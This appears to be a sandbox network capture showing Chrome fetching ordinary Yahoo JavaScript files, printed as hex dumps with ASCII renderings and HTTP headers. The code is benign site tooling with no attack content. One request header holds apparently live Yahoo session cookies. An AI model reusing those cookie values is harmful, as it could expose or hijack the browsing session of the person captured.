                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 72 61 6d 65 74 65 72 56 61 6c 75 65 42 79 4e 61 6d 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 65 7d 29 2c 6e 2e 64 28 79 2c 22 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 65 7d 29 2c 6e 2e 64 28 79 2c 22 72 65 6d 6f 76 65 54 72 61 6e 73 69 74 69 6f 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 65 7d 29 2c 6e 2e 64 28 79 2c 22 75 72 6c 69 66 79 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 65 7d 29 2c 6e 2e 64 28 79 2c 22 66 65 74 63 68 57 69 74 68 43 61 63 68 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 65 7d 29 2c 6e 2e 64 28 79 2c 22 72 65 6d 6f 76 65 43 6f 6f 6b 69 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: rameterValueByName",function(){return _e}),n.d(y,"setTransition",function(){return Ee}),n.d(y,"removeTransition",function(){return Te}),n.d(y,"urlify",function(){return ke}),n.d(y,"fetchWithCache",function(){return Ce}),n.d(y,"removeCookie",function(){ret
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 70 72 6f 74 6f 74 79 70 65 7d 28 29 2c 45 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 76 6f 69 64 20 30 21 3d 3d 65 29 72 65 74 75 72 6e 20 74 28 65 29 3b 76 61 72 20 6e 3d 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6e 6e 65 63 74 69 6f 6e 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 6d 6f 7a 43 6f 6e 6e 65 63 74 69 6f 6e 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 77 65 62 6b 69 74 43 6f 6e 6e 65 63 74 69 6f 6e 3b 69 66 28 6e 29 7b 76 61 72 20 72 3d 6e 2e 65 66 66 65 63 74 69 76 65 54 79 70 65 3b 69 66 28 22 73 6c 6f 77 2d 32 67 22 3d 3d 3d 72 7c 7c 22 32 67 22 3d 3d 3d 72 29 72 65 74 75 72 6e 20 65 3d 21 30 2c 74 28 21 30 29 2c 21 30 7d 69 66 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: prototype}(),E=function(){var e=void 0;return new Promise(function(t){if(void 0!==e)return t(e);var n=navigator.connection||navigator.mozConnection||navigator.webkitConnection;if(n){var r=n.effectiveType;if("slow-2g"===r||"2g"===r)return e=!0,t(!0),!0}if(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 75 72 6e 20 65 7d 2c 41 3d 5b 22 72 69 64 22 2c 22 63 72 75 6d 62 22 2c 22 73 75 62 73 63 72 75 6d 62 22 5d 2c 78 3d 7b 6f 6d 69 74 3a 31 2c 22 73 61 6d 65 2d 6f 72 69 67 69 6e 22 3a 31 2c 69 6e 63 6c 75 64 65 3a 31 7d 2c 4c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 22 22 2c 74 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 5b 3f 26 5d 22 2b 74 2b 22 3d 5b 5e 26 23 5d 2a 28 23 2e 2a 29 3f 24 22 29 2c 22 24 31 22 29 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 28 5b 3f 26 5d 29 22 2b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: urn e},A=["rid","crumb","subscrumb"],x={omit:1,"same-origin":1,include:1},L=function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:"",t=arguments[1];return e.replace(new RegExp("[?&]"+t+"=[^&#]*(#.*)?$"),"$1").replace(new RegExp("([?&])"+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 6d 65 64 20 6f 75 74 20 66 6f 72 20 74 69 6d 65 6f 75 74 20 76 61 6c 75 65 20 22 2b 45 2b 22 20 68 61 76 69 6e 67 20 73 74 61 72 74 54 69 6d 65 20 22 2b 61 2b 22 20 61 6e 64 20 65 6e 64 54 69 6d 65 20 22 2b 65 29 29 7d 2c 45 29 3b 54 3d 6d 26 26 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 64 62 26 26 22 63 61 63 68 65 46 69 72 73 74 22 3d 3d 3d 73 3f 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 64 62 2e 67 65 74 28 6f 2c 22 66 65 74 63 68 22 2c 7b 74 69 6d 65 6f 75 74 3a 31 65 33 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 29 7b 76 61 72 20 6e 3d 65 2e 74 74 6c 2c 72 3d 65 2e 76 61 6c 75 65 2c 69 3d 65 2e 63 61 63 68 65 64 54 69 6d 65 2c 6f 3d 28 44 61 74 65 2e 6e 6f 77 28 29 2d 69 29 2f 31 65 33 3b 74 72 79 7b 5f 3d 4a 53 4f 4e 2e 70 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: med out for timeout value "+E+" having startTime "+a+" and endTime "+e))},E);T=m&&window.wafer.db&&"cacheFirst"===s?window.wafer.db.get(o,"fetch",{timeout:1e3}).then(function(e){if(e){var n=e.ttl,r=e.value,i=e.cachedTime,o=(Date.now()-i)/1e3;try{_=JSON.pa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 28 4f 28 7b 7d 2c 65 2c 7b 5f 66 65 74 63 68 4d 65 74 61 3a 72 7d 29 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 7b 5f 66 65 74 63 68 4d 65 74 61 3a 72 7d 29 7d 29 7d 69 66 28 32 30 30 3d 3d 3d 6e 29 7b 76 61 72 20 69 3d 65 2e 68 65 61 64 65 72 73 2e 67 65 74 28 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 29 3b 69 66 28 6d 26 26 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 64 62 26 26 75 26 26 69 26 26 69 2e 6d 61 74 63 68 28 2f 61 70 70 6c 69 63 61 74 69 6f 6e 5c 2f 6a 73 6f 6e 2f 69 29 29 7b 76 61 72 20 73 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 65 2e 63 6c 6f 6e 65 28 29 2e 74 65 78 74 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .then(function(e){t(O({},e,{_fetchMeta:r}))}).catch(function(){t({_fetchMeta:r})})}if(200===n){var i=e.headers.get("Content-Type");if(m&&window.wafer.db&&u&&i&&i.match(/application\/json/i)){var s=Date.now();e.clone().text().then(function(e){return window
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 74 61 3a 7b 64 75 72 61 74 69 6f 6e 3a 44 61 74 65 2e 6e 6f 77 28 29 2d 61 2c 73 6f 75 72 63 65 3a 63 3c 69 3f 22 43 41 43 48 45 5f 53 45 43 4f 4e 44 5f 41 54 54 45 4d 50 54 22 3a 22 43 41 43 48 45 5f 53 45 43 4f 4e 44 5f 41 54 54 45 4d 50 54 5f 53 54 41 4c 45 22 7d 7d 29 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 28 65 29 7d 29 7d 65 6c 73 65 20 72 28 65 29 7d 29 7d 7d 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 61 73 73 65 74 73 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 74 3f 7b 7d 3a 74 2c 72 3d 6e 2e 63 73 73 2c 69 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 5b 5d 3a 72 3b 72 65 74 75 72 6e 20 69 3f 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 69 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ta:{duration:Date.now()-a,source:c<i?"CACHE_SECOND_ATTEMPT":"CACHE_SECOND_ATTEMPT_STALE"}}))}).catch(function(e){r(e)})}else r(e)})}})}).then(function(e){var t=e.assets,n=void 0===t?{}:t,r=n.css,i=void 0===r?[]:r;return i?Promise.all(i.map(function(e){var
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 3d 72 7c 7c 7a 3b 69 66 28 21 69 29 72 65 74 75 72 6e 20 73 65 74 54 69 6d 65 6f 75 74 28 74 2c 6e 29 3b 65 2e 68 61 73 28 69 29 7c 7c 65 2e 73 65 74 28 69 2c 6e 65 77 20 4d 61 70 29 3b 76 61 72 20 6f 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 3b 65 2e 67 65 74 28 69 29 2e 64 65 6c 65 74 65 28 6f 29 2c 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 6e 29 7d 2c 6e 29 3b 72 65 74 75 72 6e 20 65 2e 67 65 74 28 69 29 2e 73 65 74 28 6f 2c 6f 29 2c 6f 7d 29 2c 63 6c 65 61 72 41 6c 6c 54 69 6d 65 6f 75 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 65 26 26 65 2e 73 69 7a 65 29 7b 76 61 72 20 74 3d 21 30 2c 6e 3d 21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: =r||z;if(!i)return setTimeout(t,n);e.has(i)||e.set(i,new Map);var o=setTimeout(function(){var n=Array.prototype.slice.call(arguments);e.get(i).delete(o),t.apply(this,n)},n);return e.get(i).set(o,o),o}),clearAllTimeout:function(){if(e&&e.size){var t=!0,n=!


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              74192.168.2.45109587.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC415OUTGET /aaq/fp/js/tdv2-wafer-utils.customErrorHandler.bcda778b736c3a054af62f437b536e78.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC763INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: WAM2Yb3FBbUJrGEI+W/b3i1OHTOy5EQFwC+/088+NaXjhdZODfrnw/VD4+yNMduY0TWrvHZlqH3rO3fUslJFgUDvtTnSMaQ6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: V49S33V35TNFW7W3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sun, 29 Sep 2024 18:04:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 22 Nov 2023 02:30:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "bcda778b736c3a054af62f437b536e78"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: 4nvcVa.IxmhX7xaj3DD1aoyDc2oHnofW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 4249
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 781768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 5f 74 79 70 65 6f 66 28 65 29 7b 72 65 74 75 72 6e 20 5f 74 79 70 65 6f 66 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 65 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 2c 5f 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";function _typeof(e){return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_type
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 77 2e 77 61 66 65 72 2c 73 3d 21 28 21 77 69 6e 64 6f 77 2e 77 61 66 65 72 7c 7c 21 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 72 65 61 64 79 29 2c 67 3d 22 22 2e 63 6f 6e 63 61 74 28 22 2f 5f 74 64 5f 61 70 69 2f 62 65 61 63 6f 6e 22 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 69 29 2e 63 6f 6e 63 61 74 28 75 28 29 2c 22 26 73 69 74 65 3d 22 29 2e 63 6f 6e 63 61 74 28 66 2e 73 69 74 65 2c 22 26 63 6f 6e 6e 65 63 74 69 6f 6e 3d 22 29 2e 63 6f 6e 63 61 74 28 65 73 63 61 70 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 77 28 29 29 29 2c 22 26 68 61 73 57 66 3d 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 26 68 61 73 57 66 52 3d 22 29 2e 63 6f 6e 63 61 74 28 73 29 3b 76 28 67 29 2c 72 2e 5f 5f 74 65 73 74 45 72 72 6f 72 26 26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: w.wafer,s=!(!window.wafer||!window.wafer.ready),g="".concat("/_td_api/beacon","/").concat(e,"?").concat(i).concat(u(),"&site=").concat(f.site,"&connection=").concat(escape(JSON.stringify(w())),"&hasWf=").concat(c,"&hasWfR=").concat(s);v(g),r.__testError&&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 28 64 3e 33 29 26 26 28 21 72 2e 6e 61 76 69 67 61 74 6f 72 7c 7c 21 31 21 3d 3d 72 2e 6e 61 76 69 67 61 74 6f 72 2e 6f 6e 4c 69 6e 65 29 26 26 65 29 7b 76 61 72 20 6e 3d 65 2e 6d 65 74 61 2c 74 3d 65 2e 6e 61 6d 65 2c 6f 3d 65 2e 73 74 61 63 6b 2c 61 3d 6f 26 26 6f 2e 6d 65 73 73 61 67 65 7c 7c 6f 7c 7c 22 22 2c 69 3d 22 2f 22 2e 63 6f 6e 63 61 74 28 66 2e 62 65 61 63 6f 6e 50 61 74 68 2c 22 3f 65 72 72 3d 22 29 2e 63 6f 6e 63 61 74 28 74 2c 22 26 62 65 61 63 6f 6e 54 79 70 65 3d 77 61 66 65 72 5f 65 72 72 26 69 6e 66 6f 3d 22 29 2e 63 6f 6e 63 61 74 28 65 73 63 61 70 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6e 29 29 2c 22 26 73 74 61 63 6b 3d 22 29 2e 63 6f 6e 63 61 74 28 61 2c 22 26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: },m=function(e){if(!(d>3)&&(!r.navigator||!1!==r.navigator.onLine)&&e){var n=e.meta,t=e.name,o=e.stack,a=o&&o.message||o||"",i="/".concat(f.beaconPath,"?err=").concat(t,"&beaconType=wafer_err&info=").concat(escape(JSON.stringify(n)),"&stack=").concat(a,"&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC349INData Raw: 63 65 73 43 72 65 61 74 6f 72 3b 72 2e 59 41 48 4f 4f 2e 75 74 69 6c 73 2e 74 72 61 63 65 73 3d 6e 2e 63 72 65 61 74 65 54 72 61 63 65 73 49 6e 73 74 61 6e 63 65 28 7b 74 72 61 63 65 73 3a 7b 67 6c 6f 62 61 6c 41 74 74 72 69 62 75 74 65 73 3a 7b 61 75 74 68 65 64 3a 4f 2e 61 75 74 68 65 64 7c 7c 22 30 22 2c 62 75 63 6b 65 74 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 41 29 26 26 41 2e 6a 6f 69 6e 28 22 2c 22 29 7c 7c 41 2c 63 6f 6e 6e 65 63 74 3a 22 22 2e 63 6f 6e 63 61 74 28 65 73 63 61 70 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 77 28 29 29 29 29 2e 63 6f 6e 63 61 74 28 75 28 29 29 2c 64 65 76 69 63 65 3a 4f 2e 64 65 76 69 63 65 2c 65 6e 76 3a 4f 2e 65 6e 76 7c 7c 22 70 72 6f 64 75 63 74 69 6f 6e 22 2c 6c 61 6e 67 3a 4f 2e 6c 61 6e 67 2c 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: cesCreator;r.YAHOO.utils.traces=n.createTracesInstance({traces:{globalAttributes:{authed:O.authed||"0",bucket:Array.isArray(A)&&A.join(",")||A,connect:"".concat(escape(JSON.stringify(w()))).concat(u()),device:O.device,env:O.env||"production",lang:O.lang,r


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              75192.168.2.45109687.248.119.2524431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC679OUTGET /__rapid-worker-1.2.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1099INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: 0+hHr9p0xuj+fFwQVXK8zOkqa1OhpV5tfFBSYxTN/LYHvaQSk8st+XrN2zuZUdlYs23fvX2y3+OfQnwW6e2DIQqAR23qTfTK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 6VFD8T9C09J7Z5D0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sat, 07 Sep 2024 20:44:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 06 Mar 2018 20:46:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "e2202e6ed6ef52cec2c4a875c99225ba"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-meta-created-date: Wed, 15 Oct 2014 18:48:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-meta-mbst-etag: "YM:1:e64293ae-a913-4bb2-8dd1-87431f3be4230005057a946243f1"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-meta-x-ysws-mbst-vtime: 1413398917170161
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expires: Sat, 05 Sep 2026 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-meta-x-ysws-access: public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: null
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 15697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 2672946
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC787INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 2f 2a 20 40 70 72 65 73 65 72 76 65 0a 20 2a 20 24 49 64 3a 20 72 61 77 64 65 66 6c 61 74 65 2e 6a 73 2c 76 20 30 2e 33 20 32 30 30 39 2f 30 33 2f 30 31 20 31 39 3a 30 35 3a 30 35 20 64 61 6e 6b 6f 67 61 69 20 45 78 70 20 64 61 6e 6b 6f 67 61 69 20 24 0a 20 2a 0a 20 2a 20 4f 72 69 67 69 6e 61 6c 3a 0a 20 2a 20 20 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 6e 69 63 6f 73 2e 63 6f 6d 2f 73 74 61 66 66 2f 69 7a 2f 61 6d 75 73 65 2f 6a 61 76 61 73 63 72 69 70 74 2f 65 78 70 65 72 74 2f 64 65 66 6c 61 74 65 2e 74 78 74 0a 20 2a 2f 0a 2f 2a 20 40 70 72 65 73 65 72 76 65 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 39 20 4d 61 73 61 6e 61 6f 20 49 7a 75 6d 6f 20 3c 69 7a 40 6f 6e 69 63 6f 73 2e 63 6f 2e 6a 70 3e 0a 20 2a 20 56 65 72 73 69 6f 6e 3a
